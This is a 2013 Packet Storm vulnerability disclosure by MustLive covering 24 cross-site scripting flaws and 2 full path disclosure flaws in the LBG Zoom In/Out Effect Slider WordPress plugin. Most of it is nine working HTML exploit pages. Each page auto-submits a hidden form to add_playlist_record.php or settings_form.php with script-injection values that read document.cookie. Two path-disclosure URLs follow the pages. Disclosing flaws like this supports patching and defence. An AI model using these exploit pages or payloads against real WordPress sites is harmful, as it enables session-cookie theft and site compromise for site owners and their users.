LBG Zoom In/Out Effect Slider Cross Site Scripting

2013-11-05T00:00:00
ID PACKETSTORM:123914
Type packetstorm
Reporter MustLive
Modified 2013-11-05T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to inform you about vulnerabilities in LBG Zoom In/Out Effect Slider   
plugin for WordPress. In addition to one XSS in this plugin, which was   
disclosed earlier   
(http://packetstormsecurity.com/files/123367/WordPress-LBG-Zoominoutslider-Cross-Site-Scripting.html).  
  
These are Cross-Site Scripting and Full path disclosure vulnerabilities.   
Altogether 26 new holes: 24 XSS and 2 FPD vulnerabilities.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all versions of plugin LBG Zoom In/Out Effect Slider for   
WordPress.  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08):  
  
XSS in files add_playlist_record.php and settings_form.php.  
  
LBG Zoominoutslider XSS.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="img"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-2.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-link"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-3.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="thumbnail"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-4.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="alt_text"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-5.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="content"   
value='</textarea><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-6.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-initialZoom"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-7.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-finalZoom"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-8.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"   
method="post">  
<input type="hidden" name="data-duration"   
value='"><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
LBG Zoominoutslider XSS-9.html  
  
<html>  
<head>  
<title>LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013   
MustLive. http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack"   
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/settings_form.php"   
method="post">  
<input type="hidden" name="width"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="height"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="autoPlay"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="initialZoom"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="finalZoom"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="duration"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="durationIEfix"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="numberOfThumbsPerScreen"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="thumbsOnMarginTop"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="thumbsWrapperMarginTop"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleRadius"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleLineWidth"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleColor"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="circleAlpha"   
value='</script><script>alert(document.cookie)</script>'>  
<input type="hidden" name="behindCircleColor"   
value='"><script>alert(document.cookie)</script>'>  
<input type="hidden" name="behindCircleAlpha"   
value='</script><script>alert(document.cookie)</script>'>  
</form>  
</body>  
</html>  
  
Full path disclosure (WASC-13):  
  
http://site/wp-content/plugins/lbg_zoominoutslider/tpl/banners.php  
  
http://site/wp-content/plugins/lbg_zoominoutslider/tpl/playlist.php  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`